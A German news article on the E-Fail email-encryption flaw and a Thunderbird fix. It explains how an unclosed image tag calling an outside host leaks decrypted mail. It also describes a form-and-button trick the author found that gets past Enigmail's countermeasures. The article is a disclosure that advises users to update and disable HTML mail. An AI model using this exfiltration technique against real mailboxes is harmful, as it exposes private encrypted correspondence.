• IT-Karriere:
  • Services:

PGP/SMIME: Thunderbird-Update notwendig, um E-Fail zu verhindern

Thunderbird war bis Freitag für die E-Fail-Sicherheitslücke verwundbar, für Apple Mail gibt es bislang überhaupt kein Update. Vorläufig ist es empfehlenswert, HTML-Mails komplett zu deaktivieren.

Eine Exklusivmeldung von Hanno Böck veröffentlicht am
Efail konnte man auch nach einem Update von Enigmail noch ausnutzen.
Efail konnte man auch nach einem Update von Enigmail noch ausnutzen. (Bild: efail/CC0 1.0)

Nutzer des Thunderbird-Mailprogramms, die Mailverschlüsselung benutzen, sollten dringend das Update auf Version 52.8.0 installieren. Neben weiteren Sicherheitslücken werden darin verschiedene Bugs behoben, die es Angreifern ermöglichen, verschlüsselte Nachrichten zu exfiltrieren. Nach wie vor kein Update gibt es für Apple Mail, das ähnlich wie Thunderbird von der gravierendsten Variante der E-Fail-Sicherheitslücke betroffen ist.

Stellenmarkt
  1. Universität Stuttgart, Stuttgart
  2. GO! Express & Logistics (Deutschland) GmbH, Bonn

Am Montag hatten Sicherheitsforscher zahlreiche Sicherheitsprobleme bei verschlüsselten Mails publiziert. Ein Entwickler von Enigmail hatte zwischenzeitlich behauptet, dass es überhaupt keinen Grund zur Sorge gäbe: Wer die aktuelle Version installiert habe, sei sicher. Doch das stimmte nicht. Zwar hatte Enigmail Gegenmaßnahmen implementiert, die waren jedoch relativ leicht zu umgehen.

Direct Exfiltration nutzt mehrere Mailparts

Die gravierendste Variante der E-Fail-Lücke ist die sogenannte Direct Exfiltration. Dabei nutzt ein Angreifer die Tatsache aus, dass HTML-Mails mit mehreren Teilen im Mailprogramm gemeinsam gerendert werden. In der simpelsten Variante kann ein Angreifer somit etwa ein Bild von seinem eigenen Server laden und dabei den HTML-Tag nicht schließen (etwa <img src="https://efail.de/x=). Anschließend fügt er den verschlüsselten Mailinhalt ein. Dieser wird dann direkt als Parameter angehängt.

Diese Variante funktioniert aber nur, wenn das Nachladen von Inhalten bei HTML-Mails aktiviert ist. Bei Thunderbird ist es das in der Standardeinstellung nicht. Weiterhin hatten die Entwickler von Enigmail zwischen den Mailparts Anführungszeichen eingefügt. Damit wurde das Anhängen als Parameter unterbrochen.

Mit Formularen lassen sich Gegenmaßnahmen von Enigmail austricksen

Gemeinsam mit Jens Müller, einem der Co-Autoren des E-Fail-Papers, gelang es dem Autor dieses Artikels jedoch, trotz dieser beiden Hürden Mailinhalte zu exfiltrieren. Statt dem Nachladen eines Bildes kann man auch ein Formular verwenden. In dieses Formular fügt man eine Textarea ein. Der Vorteil: Bei einem <textarea>-Tag wird der Inhalt nicht von Anführungszeichen eingeschlossen, sondern von HTML-Tags.

Thunderbird versuchte bereits bisher, das Abschicken eines Formulars in einer HTML-Mail zu verhindern. Bei einem Klick auf einen normalen HTML-Submit-Button (<input type="submit">) wird zwar die Ziel-URL geladen, es werden jedoch keine Daten übertragen. Doch diese Schutzmaßnahme von Thunderbird war unvollständig: Neben dem <input>-Tag kann man einen Formularbutton auch mit dem <button>-Element einfügen. Und da griff die Schutzmaßnahme bislang nicht.

Somit kann ein Angreifer Folgendes machen: Er erzeugt eine Mail, die ein Formular enthält. Im Formular gibt es ein Textarea-Feld, das den verschlüsselten Teil, der exfiltriert werden soll, einschließt. Weiterhin fügt der Angreifer mit dem <button>-Element einen Button ein.

Um das Ganze möglichst unauffällig zu machen, kann man das Textarea-Feld und den Button mittels CSS unsichtbar machen. Weiterhin kann man den Button über die gesamte Mail legen. Das hat zur Folge, dass ein beliebiger Mausklick irgendwo in der dargestellten Mail dazu führt, dass die Daten an den Angreifer geschickt werden.

In der jetzt veröffentlichten Thunderbird-Version ist das Abschicken von Formularen mittels des <button>-Tags nicht mehr möglich. Damit wird der Angriff in dieser Form verhindert.

Weitere Lücken denkbar

Nach wie vor stellt Thunderbird mehrere Mailteile in einem HTML-Kontext dar. Das soll erst in einer kommenden Version behoben werden. Daher ist es gut möglich, dass weitere Tricks gefunden werden, mit denen man Mailinhalte exfiltrieren kann. Es empfielt sich daher, die Darstellung von HTML-Mails generell abzuschalten.

Apple Mail ist laut Aussage der E-Fail-Entdecker weiterhin vollständig für die Direct-Exfiltration-Lücke verwundbar. Wir haben Apple um eine Stellungnahme gebeten, bisher aber keine Antwort erhalten.

Nach der Veröffentlichung von E-Fail kam es zu heftigen Diskussionen über die Art der Veröffentlichung und insbesondere über die Warnungen der Electronic Frontier Foundation. Ein entscheidender Aspekt wurde dabei bislang wenig beachtet: Trotz monatelanger Vorwarnzeit waren wichtige Softwareprojekte nicht in der Lage, rechtzeitig Sicherheitsupdates bereitzustellen.

Bitte aktivieren Sie Javascript.
Oder nutzen Sie das Golem-pur-Angebot
und lesen Golem.de
  • ohne Werbung
  • mit ausgeschaltetem Javascript
  • mit RSS-Volltext-Feed


Anzeige
Spiele-Angebote
  1. (-66%) 16,99€
  2. (-74%) 15,50€
  3. (-70%) 5,99€
  4. 52,99€

navtis 22. Mai 2018

Ist es, wenn man feststellt, dass die mail nicht signiert war, nicht längst zu spät?

Sharra 22. Mai 2018

Auch in "deiner Welt" kann man updates automatisieren... Was hier und da auch durchaus...

throgh 20. Mai 2018

Und? Wie lange hat es jetzt gedauert bis erste Korrekturen vorgelegen haben? Ja, Open...


Folgen Sie uns
       


Samsungs 49-Zoll-QLED-Gaming-Monitor - Test

Der Samsung CRG9 ist nicht nur durch sein 32:9-Format beeindruckend. Auch die hohe Bildfrequenz und sehr gute Helligkeit ermöglichen ein sehr immersives Gaming und viel Platz für Multitasking.

Samsungs 49-Zoll-QLED-Gaming-Monitor - Test Video aufrufen
Weltraumsimulation: Die Star-Citizen-Euphorie ist ansteckend
Weltraumsimulation
Die Star-Citizen-Euphorie ist ansteckend

Jubelnde Massen, ehrliche Entwickler und ein 30 Kilogramm schweres Modell des Javelin-Zerstörers: Die Citizencon 2949 hat gezeigt, wie sehr die Community ihr Star Citizen liebt. Auf der anderen Seite reden Entwickler Klartext, statt Marketing-Floskeln zum Besten zu geben. Das steckt an.
Ein IMHO von Oliver Nickel

  1. Theatres of War angespielt Star Citizen wird zu Battlefield mit Raumschiffen
  2. Star Citizen Mit der Carrack ins neue Sonnensystem
  3. Star Citizen Squadron 42 wird noch einmal verschoben

Jobs: Spielebranche sucht Entwickler (m/w/d)
Jobs
Spielebranche sucht Entwickler (m/w/d)

Die Hälfte aller Gamer ist weiblich. An der Entwicklung von Spielen sind aber nach wie vor deutlich weniger Frauen beteiligt.
Von Daniel Ziegener

  1. Medizinsoftware Forscher finden "rassistische Vorurteile" in Algorithmus
  2. Mordhau Toxische Spieler und Filter für Frauenhasser

Mobile-Games-Auslese: Märchen-Diablo für Mobile-Geräte
Mobile-Games-Auslese
Märchen-Diablo für Mobile-Geräte

"Einarmiger Schmied" als Klasse? Diablo bietet das nicht - das wunderschöne Yaga schon. Auch sonst finden sich in der neuen Mobile-Games-Auslese viele spannende und originelle Perlen.
Von Rainer Sigl

  1. Mobile-Games-Auslese Fantasypixel und Verkehrsplanung für unterwegs
  2. Mobile-Games-Auslese Superheld und Schlapphutträger zu Besuch im Smartphone
  3. Mobile-Games-Auslese Verdrehte Räume und verrückte Zombies für unterwegs

    •  /